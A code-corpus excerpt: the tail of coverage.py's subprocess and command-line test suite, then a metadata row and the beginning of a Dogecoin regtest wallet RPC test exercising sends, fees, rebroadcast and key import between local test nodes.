actual = self.run_command("coverage run --source process_test myscript")
self.assert_tryexecfile_output(expected, actual)
st, out = self.run_command_status("coverage report")
self.assertEqual(st, 0)
self.assertEqual(self.line_count(out), 6, out)
def test_coverage_run_dashm_is_like_python_dashm_off_path(self):
# https://bitbucket.org/ned/coveragepy/issue/242
self.make_file("sub/__init__.py", "")
with open(TRY_EXECFILE) as f:
self.make_file("sub/run_me.py", f.read())
expected = self.run_command("python -m sub.run_me")
actual = self.run_command("coverage run -m sub.run_me")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_is_like_python_dashm_with__main__207(self):
# https://bitbucket.org/ned/coveragepy/issue/207
self.make_file("package/__init__.py", "print('init')")
self.make_file("package/__main__.py", "print('main')")
expected = self.run_command("python -m package")
actual = self.run_command("coverage run -m package")
self.assertMultiLineEqual(expected, actual)
def test_coverage_custom_script(self):
# https://github.com/nedbat/coveragepy/issues/678
# If sys.path[0] isn't the Python default, then coverage.py won't
# fiddle with it.
self.make_file("a/b/c/thing.py", """\
SOMETHING = "hello-xyzzy"
""")
abc = os.path.abspath("a/b/c")
self.make_file("run_coverage.py", """\
import sys
sys.path[0:0] = [
r'{abc}',
'/Users/somebody/temp/something/eggs/something-4.5.1-py2.7-xxx-10.13-x86_64.egg',
]
import coverage.cmdline
if __name__ == '__main__':
sys.exit(coverage.cmdline.main())
""".format(abc=abc))
self.make_file("how_is_it.py", """\
import pprint, sys
pprint.pprint(sys.path)
import thing
print(thing.SOMETHING)
""")
# If this test fails, it will be with "can't import thing".
out = self.run_command("python run_coverage.py run how_is_it.py")
self.assertIn("hello-xyzzy", out)
out = self.run_command("python -m run_coverage run how_is_it.py")
self.assertIn("hello-xyzzy", out)
class ExcepthookTest(CoverageTest):
"""Tests of sys.excepthook support."""
def test_excepthook(self):
self.make_file("excepthook.py", """\
import sys
def excepthook(*args):
print('in excepthook')
if maybe == 2:
print('definitely')
sys.excepthook = excepthook
maybe = 1
raise RuntimeError('Error Outside')
""")
cov_st, cov_out = self.run_command_status("coverage run excepthook.py")
py_st, py_out = self.run_command_status("python excepthook.py")
if not env.JYTHON:
self.assertEqual(cov_st, py_st)
self.assertEqual(cov_st, 1)
self.assertIn("in excepthook", py_out)
self.assertEqual(cov_out, py_out)
# Read the coverage file and see that excepthook.py has 7 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['excepthook.py'], 7)
def test_excepthook_exit(self):
if env.PYPY or env.JYTHON:
self.skipTest("non-CPython handles excepthook exits differently, punt for now.")
self.make_file("excepthook_exit.py", """\
import sys
def excepthook(*args):
print('in excepthook')
sys.exit(0)
sys.excepthook = excepthook
raise RuntimeError('Error Outside')
""")
cov_st, cov_out = self.run_command_status("coverage run excepthook_exit.py")
py_st, py_out = self.run_command_status("python excepthook_exit.py")
self.assertEqual(cov_st, py_st)
self.assertEqual(cov_st, 0)
self.assertIn("in excepthook", py_out)
self.assertEqual(cov_out, py_out)
def test_excepthook_throw(self):
if env.PYPY:
self.skipTest("PyPy handles excepthook throws differently, punt for now.")
self.make_file("excepthook_throw.py", """\
import sys
def excepthook(*args):
# Write this message to stderr so that we don't have to deal
# with interleaved stdout/stderr comparisons in the assertions
# in the test.
sys.stderr.write('in excepthook\\n')
raise RuntimeError('Error Inside')
sys.excepthook = excepthook
raise RuntimeError('Error Outside')
""")
cov_st, cov_out = self.run_command_status("coverage run excepthook_throw.py")
py_st, py_out = self.run_command_status("python excepthook_throw.py")
if not env.JYTHON:
self.assertEqual(cov_st, py_st)
self.assertEqual(cov_st, 1)
self.assertIn("in excepthook", py_out)
self.assertEqual(cov_out, py_out)
class AliasedCommandTest(CoverageTest):
"""Tests of the version-specific command aliases."""
run_in_temp_dir = False
def setUp(self):
if env.JYTHON:
self.skipTest("Coverage command names don't work on Jython")
super(AliasedCommandTest, self).setUp()
def test_major_version_works(self):
# "coverage2" works on py2
cmd = "coverage%d" % sys.version_info[0]
out = self.run_command(cmd)
self.assertIn("Code coverage for Python", out)
def test_wrong_alias_doesnt_work(self):
# "coverage3" doesn't work on py2
assert sys.version_info[0] in [2, 3] # Let us know when Python 4 is out...
badcmd = "coverage%d" % (5 - sys.version_info[0])
out = self.run_command(badcmd)
self.assertNotIn("Code coverage for Python", out)
def test_specific_alias_works(self):
# "coverage-2.7" works on py2.7
cmd = "coverage-%d.%d" % sys.version_info[:2]
out = self.run_command(cmd)
self.assertIn("Code coverage for Python", out)
def test_aliases_used_in_messages(self):
cmds = [
"coverage",
"coverage%d" % sys.version_info[0],
"coverage-%d.%d" % sys.version_info[:2],
]
for cmd in cmds:
out = self.run_command("%s foobar" % cmd)
self.assertIn("Unknown command: 'foobar'", out)
self.assertIn("Use '%s help' for help" % cmd, out)
class PydocTest(CoverageTest):
"""Test that pydoc can get our information."""
run_in_temp_dir = False
def assert_pydoc_ok(self, name, thing):
"""Check that pydoc of `name` finds the docstring from `thing`."""
# Run pydoc.
out = self.run_command("python -m pydoc " + name)
# It should say "Help on..", and not have a traceback
self.assert_starts_with(out, "Help on ")
self.assertNotIn("Traceback", out)
# All of the lines in the docstring should be there somewhere.
for line in thing.__doc__.splitlines():
self.assertIn(line.strip(), out)
def test_pydoc_coverage(self):
self.assert_pydoc_ok("coverage", coverage)
def test_pydoc_coverage_coverage(self):
self.assert_pydoc_ok("coverage.Coverage", coverage.Coverage)
class FailUnderTest(CoverageTest):
"""Tests of the --fail-under switch."""
def setUp(self):
super(FailUnderTest, self).setUp()
self.make_file("forty_two_plus.py", """\
# I have 42.857% (3/7) coverage!
a = 1
b = 2
if a > 3:
b = 4
c = 5
d = 6
e = 7
""")
st, _ = self.run_command_status("coverage run --source=. forty_two_plus.py")
self.assertEqual(st, 0)
def test_report_43_is_ok(self):
st, out = self.run_command_status("coverage report --fail-under=43")
self.assertEqual(st, 0)
self.assertEqual(self.last_line_squeezed(out), "forty_two_plus.py 7 4 43%")
def test_report_43_is_not_ok(self):
st, out = self.run_command_status("coverage report --fail-under=44")
self.assertEqual(st, 2)
self.assertEqual(self.last_line_squeezed(out), "forty_two_plus.py 7 4 43%")
def test_report_42p86_is_not_ok(self):
self.make_file(".coveragerc", "[report]\nprecision = 2")
st, out = self.run_command_status("coverage report --fail-under=42.88")
self.assertEqual(st, 2)
self.assertEqual(self.last_line_squeezed(out), "forty_two_plus.py 7 4 42.86%")
class FailUnderNoFilesTest(CoverageTest):
"""Test that nothing to report results in an error exit status."""
def test_report(self):
self.make_file(".coveragerc", "[report]\nfail_under = 99\n")
st, out = self.run_command_status("coverage report")
self.assertIn('No data to report.', out)
self.assertEqual(st, 1)
class FailUnderEmptyFilesTest(CoverageTest):
"""Test that empty files produce the proper fail_under exit status."""
def test_report(self):
self.make_file(".coveragerc", "[report]\nfail_under = 99\n")
self.make_file("empty.py", "")
st, _ = self.run_command_status("coverage run empty.py")
self.assertEqual(st, 0)
st, _ = self.run_command_status("coverage report")
self.assertEqual(st, 2)
class UnicodeFilePathsTest(CoverageTest):
"""Tests of using non-ascii characters in the names of files."""
def setUp(self):
if env.JYTHON:
self.skipTest("Jython doesn't like accented file names")
super(UnicodeFilePathsTest, self).setUp()
def test_accented_dot_py(self):
# Make a file with a non-ascii character in the filename.
self.make_file(u"h\xe2t.py", "print('accented')")
out = self.run_command(u"coverage run --source=. h\xe2t.py")
self.assertEqual(out, "accented\n")
# The HTML report uses ascii-encoded HTML entities.
out = self.run_command("coverage html")
self.assertEqual(out, "")
self.assert_exists(u"htmlcov/h\xe2t_py.html")
with open("htmlcov/index.html") as indexf:
index = indexf.read()
self.assertIn('<a href="hât_py.html">hât.py</a>', index)
# The XML report is always UTF8-encoded.
out = self.run_command("coverage xml")
self.assertEqual(out, "")
with open("coverage.xml", "rb") as xmlf:
xml = xmlf.read()
self.assertIn(u' filename="h\xe2t.py"'.encode('utf8'), xml)
self.assertIn(u' name="h\xe2t.py"'.encode('utf8'), xml)
report_expected = (
u"Name Stmts Miss Cover\n"
u"----------------------------\n"
u"h\xe2t.py 1 0 100%\n"
)
if env.PY2:
report_expected = report_expected.encode(output_encoding())
out = self.run_command("coverage report")
self.assertEqual(out, report_expected)
def test_accented_directory(self):
# Make a file with a non-ascii character in the directory name.
self.make_file(u"\xe2/accented.py", "print('accented')")
out = self.run_command(u"coverage run --source=. \xe2/accented.py")
self.assertEqual(out, "accented\n")
# The HTML report uses ascii-encoded HTML entities.
out = self.run_command("coverage html")
self.assertEqual(out, "")
self.assert_exists(u"htmlcov/\xe2_accented_py.html")
with open("htmlcov/index.html") as indexf:
index = indexf.read()
self.assertIn('<a href="â_accented_py.html">â%saccented.py</a>' % os.sep, index)
# The XML report is always UTF8-encoded.
out = self.run_command("coverage xml")
self.assertEqual(out, "")
with open("coverage.xml", "rb") as xmlf:
xml = xmlf.read()
self.assertIn(b' filename="\xc3\xa2/accented.py"', xml)
self.assertIn(b' name="accented.py"', xml)
dom = ElementTree.parse("coverage.xml")
elts = dom.findall(u".//package[@name='â']")
assert len(elts) == 1
assert elts[0].attrib == {
"branch-rate": u"0",
"complexity": u"0",
"line-rate": u"1",
"name": u"â",
}
report_expected = (
u"Name Stmts Miss Cover\n"
u"-----------------------------------\n"
u"\xe2%saccented.py 1 0 100%%\n" % os.sep
)
if env.PY2:
report_expected = report_expected.encode(output_encoding())
out = self.run_command("coverage report")
self.assertEqual(out, report_expected)
class YankedDirectoryTest(CoverageTest):
"""Tests of what happens when the current directory is deleted."""
def setUp(self):
if env.WINDOWS:
self.skipTest("Windows can't delete the directory in use.")
super(YankedDirectoryTest, self).setUp()
BUG_806 = """\
import os
import sys
import tempfile
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
os.rmdir(tmpdir)
print(sys.argv[1])
"""
def test_removing_directory(self):
self.make_file("bug806.py", self.BUG_806)
out = self.run_command("coverage run bug806.py noerror")
self.assertEqual(out, "noerror\n")
def test_removing_directory_with_error(self):
self.make_file("bug806.py", self.BUG_806)
out = self.run_command("coverage run bug806.py")
path = python_reported_file('bug806.py')
self.assertEqual(out, textwrap.dedent("""\
Traceback (most recent call last):
File "{}", line 8, in <module>
print(sys.argv[1])
IndexError: list index out of range
""".format(path)))
def possible_pth_dirs():
"""Produce a sequence of directories for trying to write .pth files."""
# First look through sys.path, and if we find a .pth file, then it's a good
# place to put ours.
for pth_dir in sys.path: # pragma: part covered
pth_files = glob.glob(os.path.join(pth_dir, "*.pth"))
if pth_files:
yield pth_dir
# If we're still looking, then try the Python library directory.
# https://bitbucket.org/ned/coveragepy/issue/339/pth-test-malfunctions
yield distutils.sysconfig.get_python_lib() # pragma: cant happen
def find_writable_pth_directory():
"""Find a place to write a .pth file."""
for pth_dir in possible_pth_dirs(): # pragma: part covered
try_it = os.path.join(pth_dir, "touch_{}.it".format(WORKER))
with open(try_it, "w") as f:
try:
f.write("foo")
except (IOError, OSError): # pragma: cant happen
continue
os.remove(try_it)
return pth_dir
return None # pragma: cant happen
WORKER = os.environ.get('PYTEST_XDIST_WORKER', '')
PTH_DIR = find_writable_pth_directory()
def persistent_remove(path):
"""Remove a file, and retry for a while if you can't."""
tries = 100
while tries: # pragma: part covered
try:
os.remove(path)
except OSError:
tries -= 1
time.sleep(.05)
else:
return
raise Exception("Sorry, couldn't remove {!r}".format(path)) # pragma: cant happen
class ProcessCoverageMixin(object):
"""Set up a .pth file to coverage-measure all sub-processes."""
def setUp(self):
super(ProcessCoverageMixin, self).setUp()
# Create the .pth file.
self.assertTrue(PTH_DIR)
pth_contents = "import coverage; coverage.process_startup()\n"
pth_path = os.path.join(PTH_DIR, "subcover_{}.pth".format(WORKER))
with open(pth_path, "w") as pth:
pth.write(pth_contents)
self.pth_path = pth_path
self.addCleanup(persistent_remove, self.pth_path)
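# Background note (added comment): CPython's site module executes any line in a *.pth file
# that begins with "import", so the subcover_*.pth file written above makes every newly
# started interpreter call coverage.process_startup() and measure its own coverage.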
class ProcessStartupTest(ProcessCoverageMixin, CoverageTest):
"""Test that we can measure coverage in sub-processes."""
def setUp(self):
super(ProcessStartupTest, self).setUp()
# Main will run sub.py
self.make_file("main.py", """\
import os, os.path, sys
ex = os.path.basename(sys.executable)
os.system(ex + " sub.py")
""")
# sub.py will write a few lines.
self.make_file("sub.py", """\
f = open("out.txt", "w")
f.write("Hello, world!\\n")
f.close()
""")
def test_subprocess_with_pth_files(self): # pragma: no metacov
if env.METACOV:
            self.skipTest("Can't test sub-process pth file support during metacoverage")
# An existing data file should not be read when a subprocess gets
# measured automatically. Create the data file here with bogus data in
# it.
data = coverage.CoverageData(".mycovdata")
data.add_lines({os.path.abspath('sub.py'): dict.fromkeys(range(100))})
data.write()
self.make_file("coverage.ini", """\
[run]
data_file = .mycovdata
""")
self.set_environ("COVERAGE_PROCESS_START", "coverage.ini")
import main # pylint: disable=unused-import
with open("out.txt") as f:
self.assertEqual(f.read(), "Hello, world!\n")
# Read the data from .coverage
self.assert_exists(".mycovdata")
data = coverage.CoverageData(".mycovdata")
data.read()
self.assertEqual(line_counts(data)['sub.py'], 3)
def test_subprocess_with_pth_files_and_parallel(self): # pragma: no metacov
# https://bitbucket.org/ned/coveragepy/issues/492/subprocess-coverage-strange-detection-of
if env.METACOV:
            self.skipTest("Can't test sub-process pth file support during metacoverage")
self.make_file("coverage.ini", """\
[run]
parallel = true
""")
self.set_environ("COVERAGE_PROCESS_START", "coverage.ini")
self.run_command("coverage run main.py")
with open("out.txt") as f:
self.assertEqual(f.read(), "Hello, world!\n")
self.run_command("coverage combine")
# assert that the combined .coverage data file is correct
self.assert_exists(".coverage")
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['sub.py'], 3)
# assert that there are *no* extra data files left over after a combine
data_files = glob.glob(os.getcwd() + '/.coverage*')
self.assertEqual(len(data_files), 1,
"Expected only .coverage after combine, looks like there are "
"extra data files that were not cleaned up: %r" % data_files)
class ProcessStartupWithSourceTest(ProcessCoverageMixin, CoverageTest):
"""Show that we can configure {[run]source} during process-level coverage.
There are three interesting variables, for a total of eight tests:
1. -m versus a simple script argument (for example, `python myscript`),
2. filtering for the top-level (main.py) or second-level (sub.py)
module, and
3. whether the files are in a package or not.
"""
def assert_pth_and_source_work_together(
self, dashm, package, source
): # pragma: no metacov
"""Run the test for a particular combination of factors.
The arguments are all strings:
* `dashm`: Either "" (run the program as a file) or "-m" (run the
program as a module).
* `package`: Either "" (put the source at the top level) or a
package name to use to hold the source.
* `source`: Either "main" or "sub", which file to use as the
``--source`` argument.
"""
if env.METACOV:
self.skipTest("Can't test sub-process pth file support during metacoverage")
def fullname(modname):
"""What is the full module name for `modname` for this test?"""
if package and dashm:
return '.'.join((package, modname))
else:
return modname
def path(basename):
"""Where should `basename` be created for this test?"""
return os.path.join(package, basename)
# Main will run sub.py.
self.make_file(path("main.py"), """\
import %s
a = 2
b = 3
""" % fullname('sub'))
if package:
self.make_file(path("__init__.py"), "")
# sub.py will write a few lines.
self.make_file(path("sub.py"), """\
# Avoid 'with' so Jython can play along.
f = open("out.txt", "w")
f.write("Hello, world!")
f.close()
""")
self.make_file("coverage.ini", """\
[run]
source = %s
""" % fullname(source))
self.set_environ("COVERAGE_PROCESS_START", "coverage.ini")
if dashm:
cmd = "python -m %s" % fullname('main')
else:
cmd = "python %s" % path('main.py')
self.run_command(cmd)
with open("out.txt") as f:
self.assertEqual(f.read(), "Hello, world!")
# Read the data from .coverage
self.assert_exists(".coverage")
data = coverage.CoverageData()
data.read()
summary = line_counts(data)
print(summary)
self.assertEqual(summary[source + '.py'], 3)
self.assertEqual(len(summary), 1)
def test_dashm_main(self):
self.assert_pth_and_source_work_together('-m', '', 'main')
def test_script_main(self):
self.assert_pth_and_source_work_together('', '', 'main')
def test_dashm_sub(self):
self.assert_pth_and_source_work_together('-m', '', 'sub')
def test_script_sub(self):
self.assert_pth_and_source_work_together('', '', 'sub')
def test_dashm_pkg_main(self):
self.assert_pth_and_source_work_together('-m', 'pkg', 'main')
def test_script_pkg_main(self):
self.assert_pth_and_source_work_together('', 'pkg', 'main')
def test_dashm_pkg_sub(self):
self.assert_pth_and_source_work_together('-m', 'pkg', 'sub')
def test_script_pkg_sub(self):
self.assert_pth_and_source_work_together('', 'pkg', 'sub')
| 37.246704 | 100 | 0.595072 |
4a1e635c0d5b4f0916f074d0d7c878c7dea7b5b7 | 18,648 | py | Python | qa/rpc-tests/wallet.py | GamingMad101/dogecoin | 768718dabadf9a9d9b1e178531f8c5f83fdca73c | ["MIT"] | 1 | 2021-02-13T21:59:46.000Z | 2021-02-13T21:59:46.000Z | qa/rpc-tests/wallet.py | GamingMad101/dogecoin | 768718dabadf9a9d9b1e178531f8c5f83fdca73c | ["MIT"] | null | null | null | qa/rpc-tests/wallet.py | GamingMad101/dogecoin | 768718dabadf9a9d9b1e178531f8c5f83fdca73c | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletTest (BitcoinTestFramework):
def check_fee_amount(self, curr_balance, balance_with_fee, fee_per_byte, tx_size):
"""Return curr_balance after asserting the fee was in range"""
fee = balance_with_fee - curr_balance
assert_fee_amount(fee, tx_size, fee_per_byte * 1000)
return curr_balance
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
self.extra_args = [['-usehd={:d}'.format(i%2==0)] for i in range(4)]
def setup_network(self, split=False):
self.nodes = start_nodes(3, self.options.tmpdir, self.extra_args[:3])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test (self):
# Check that there's no UTXO on none of the nodes
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
assert_equal(len(self.nodes[2].listunspent()), 0)
print("Mining blocks...")
self.nodes[0].generate(1)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 500000)
assert_equal(walletinfo['balance'], 0)
self.sync_all()
self.nodes[1].generate(61)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 500000)
assert_equal(self.nodes[1].getbalance(), 500000)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that only first and second nodes have UTXOs
assert_equal(len(self.nodes[0].listunspent()), 1)
assert_equal(len(self.nodes[1].listunspent()), 1)
assert_equal(len(self.nodes[2].listunspent()), 0)
# Send 210.000 spiff from 0 to 2 using sendtoaddress call.
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 110000)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 100000)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 0)
# Have node0 mine a block, thus it will collect its own fee.
self.nodes[0].generate(1)
self.sync_all()
# Exercise locking of unspent outputs
unspent_0 = self.nodes[2].listunspent()[0]
unspent_0 = {"txid": unspent_0["txid"], "vout": unspent_0["vout"]}
self.nodes[2].lockunspent(False, [unspent_0])
assert_raises_message(JSONRPCException, "Insufficient funds", self.nodes[2].sendtoaddress, self.nodes[2].getnewaddress(), 200000)
assert_equal([unspent_0], self.nodes[2].listlockunspent())
self.nodes[2].lockunspent(True, [unspent_0])
assert_equal(len(self.nodes[2].listlockunspent()), 0)
# Have node1 generate 60 blocks (so node0 can recover the fee)
self.nodes[1].generate(60)
self.sync_all()
# node0 should end up with 1.000.000 spiff in block rewards plus fees, but
# minus the 210.000 plus fees sent to node2
assert_equal(self.nodes[0].getbalance(), 1000000-210000)
assert_equal(self.nodes[2].getbalance(), 210000)
# Node0 should have two unspent outputs.
# Create a couple of transactions to send them to node2, submit them through
# node1, and make sure both node0 and node2 pick them up properly:
node0utxos = self.nodes[0].listunspent(1)
assert_equal(len(node0utxos), 2)
# create both transactions
txns_to_send = []
for utxo in node0utxos:
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]})
outputs[self.nodes[2].getnewaddress("from1")] = utxo["amount"] - 3
raw_tx = self.nodes[0].createrawtransaction(inputs, outputs)
txns_to_send.append(self.nodes[0].signrawtransaction(raw_tx))
# Have node 1 (miner) send the transactions
self.nodes[1].sendrawtransaction(txns_to_send[0]["hex"], True)
self.nodes[1].sendrawtransaction(txns_to_send[1]["hex"], True)
# Have node1 mine a block to confirm transactions:
self.nodes[1].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 999994)
assert_equal(self.nodes[2].getbalance("from1"), 999994-210000)
# Send 100000 spiff normal
address = self.nodes[0].getnewaddress("test")
fee_per_byte = Decimal('1') / 1000
self.nodes[2].settxfee(fee_per_byte * 1000)
txid = self.nodes[2].sendtoaddress(address, 100000, "", "", False)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), Decimal('899994'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), Decimal('100000'))
# Send 100000 spiff with subtract fee from amount
txid = self.nodes[2].sendtoaddress(address, 100000, "", "", True)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('100000')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), Decimal('200000'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Sendmany 100000 spiff
txid = self.nodes[2].sendmany('from1', {address: 100000}, 0, "", [])
self.nodes[2].generate(1)
self.sync_all()
node_0_bal += Decimal('100000')
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), node_2_bal - Decimal('100000'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), node_0_bal)
# Sendmany 100000 with subtract fee from amount
txid = self.nodes[2].sendmany('from1', {address: 100000}, 0, "", [address])
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('100000')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), node_0_bal + Decimal('100000'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Test ResendWalletTransactions:
# Create a couple of transactions, then start up a fourth
# node (nodes[3]) and ask nodes[0] to rebroadcast.
# EXPECT: nodes[3] should have those transactions in its mempool.
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 100000)
txid2 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 100000)
sync_mempools(self.nodes)
self.nodes.append(start_node(3, self.options.tmpdir, self.extra_args[3]))
connect_nodes_bi(self.nodes, 0, 3)
sync_blocks(self.nodes)
relayed = self.nodes[0].resendwallettransactions()
assert_equal(set(relayed), {txid1, txid2})
sync_mempools(self.nodes)
assert(txid1 in self.nodes[3].getrawmempool())
# Exercise balance rpcs
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], 100000)
assert_equal(self.nodes[0].getunconfirmedbalance(), 100000)
#check if we can list zero value tx as available coins
#1. create rawtx
#2. hex-changed one output to 0.0
#3. sign and send
#4. check if recipient (node0) can list the zero value tx
usp = self.nodes[1].listunspent()
inputs = [{"txid":usp[0]['txid'], "vout":usp[0]['vout']}]
outputs = {self.nodes[1].getnewaddress(): 499998, self.nodes[0].getnewaddress(): 11.11}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs).replace("c0833842", "00000000") #replace 11.11 with 0.0 (int32)
decRawTx = self.nodes[1].decoderawtransaction(rawTx)
signedRawTx = self.nodes[1].signrawtransaction(rawTx)
decRawTx = self.nodes[1].decoderawtransaction(signedRawTx['hex'])
zeroValueTxid= decRawTx['txid']
sendResp = self.nodes[1].sendrawtransaction(signedRawTx['hex'])
self.sync_all()
self.nodes[1].generate(1) #mine a block
self.sync_all()
unspentTxs = self.nodes[0].listunspent() #zero value tx must be in listunspents output
found = False
for uTx in unspentTxs:
if uTx['txid'] == zeroValueTxid:
found = True
assert_equal(uTx['amount'], Decimal('0'))
assert(found)
#do some -walletbroadcast tests
stop_nodes(self.nodes)
self.nodes = start_nodes(3, self.options.tmpdir, [["-walletbroadcast=0"],["-walletbroadcast=0"],["-walletbroadcast=0"]])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all()
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 20000)
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
self.nodes[1].generate(1) #mine a block, tx should not be in there
self.sync_all()
assert_equal(self.nodes[2].getbalance(), node_2_bal) #should not be changed because tx was not broadcasted
#now broadcast from another node, mine a block, sync, and check the balance
self.nodes[1].sendrawtransaction(txObjNotBroadcasted['hex'])
self.nodes[1].generate(1)
self.sync_all()
node_2_bal += 20000
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#create another tx
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 20000)
#restart the nodes with -walletbroadcast=1
stop_nodes(self.nodes)
self.nodes = start_nodes(3, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
sync_blocks(self.nodes)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
node_2_bal += 20000
#tx should be added to balance because after restarting the nodes tx should be broadcasted
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#send a tx with value in a string (PR#6380 +)
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "20000")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-20000'))
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-1'))
#check if JSON parser can handle scientific notation in strings
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "10000e-4")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-1'))
try:
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1f-4")
except JSONRPCException as e:
assert("Invalid amount" in e.error['message'])
else:
raise AssertionError("Must not parse invalid amounts")
try:
self.nodes[0].generate("2")
raise AssertionError("Must not accept strings as numeric")
except JSONRPCException as e:
assert("not an integer" in e.error['message'])
# Import address and private key to check correct behavior of spendable unspents
# 1. Send some coins to generate new UTXO
address_to_import = self.nodes[2].getnewaddress()
txid = self.nodes[0].sendtoaddress(address_to_import, 1)
self.nodes[0].generate(1)
self.sync_all()
# 2. Import address from node2 to node1
self.nodes[1].importaddress(address_to_import)
# 3. Validate that the imported address is watch-only on node1
assert(self.nodes[1].validateaddress(address_to_import)["iswatchonly"])
# 4. Check that the unspents after import are not spendable
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": False})
# 5. Import private key of the previously imported address on node1
priv_key = self.nodes[2].dumpprivkey(address_to_import)
self.nodes[1].importprivkey(priv_key)
# 6. Check that the unspents are now spendable on node1
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": True})
# Mine a block from node0 to an address from node1
cbAddr = self.nodes[1].getnewaddress()
blkHash = self.nodes[0].generatetoaddress(1, cbAddr)[0]
cbTxId = self.nodes[0].getblock(blkHash)['tx'][0]
self.sync_all()
# Check that the txid and balance is found by node1
self.nodes[1].gettransaction(cbTxId)
# check if wallet or blockchain maintenance changes the balance
self.sync_all()
blocks = self.nodes[0].generate(2)
self.sync_all()
balance_nodes = [self.nodes[i].getbalance() for i in range(3)]
block_count = self.nodes[0].getblockcount()
# Check modes:
# - True: unicode escaped as \u....
# - False: unicode directly as UTF-8
for mode in [True, False]:
self.nodes[0].ensure_ascii = mode
# unicode check: Basic Multilingual Plane, Supplementary Plane respectively
for s in [u'рыба', u'𝅘𝅥𝅯']:
addr = self.nodes[0].getaccountaddress(s)
label = self.nodes[0].getaccount(addr)
assert_equal(label, s)
assert(s in self.nodes[0].listaccounts().keys())
self.nodes[0].ensure_ascii = True # restore to default
# maintenance tests
maintenance = [
'-rescan',
'-reindex',
'-zapwallettxes=1',
'-zapwallettxes=2',
# disabled until issue is fixed: https://github.com/bitcoin/bitcoin/issues/7463
# '-salvagewallet',
]
chainlimit = 6
for m in maintenance:
print("check " + m)
stop_nodes(self.nodes)
# set lower ancestor limit for later
self.nodes = start_nodes(3, self.options.tmpdir, [[m, "-limitancestorcount="+str(chainlimit)]] * 3)
while m == '-reindex' and [block_count] * 3 != [self.nodes[i].getblockcount() for i in range(3)]:
# reindex will leave rpc warm up "early"; Wait for it to finish
time.sleep(0.1)
assert_equal(balance_nodes, [self.nodes[i].getbalance() for i in range(3)])
# Exercise listsinceblock with the last two blocks
coinbase_tx_1 = self.nodes[0].listsinceblock(blocks[0])
assert_equal(coinbase_tx_1["lastblock"], blocks[1])
assert_equal(len(coinbase_tx_1["transactions"]), 1)
assert_equal(coinbase_tx_1["transactions"][0]["blockhash"], blocks[1])
assert_equal(len(self.nodes[0].listsinceblock(blocks[1])["transactions"]), 0)
# ==Check that wallet prefers to use coins that don't exceed mempool limits =====
# Get all non-zero utxos together
chain_addrs = [self.nodes[0].getnewaddress(), self.nodes[0].getnewaddress()]
singletxid = self.nodes[0].sendtoaddress(chain_addrs[0], self.nodes[0].getbalance(), "", "", True)
self.nodes[0].generate(1)
node0_balance = self.nodes[0].getbalance()
# Split into two chains
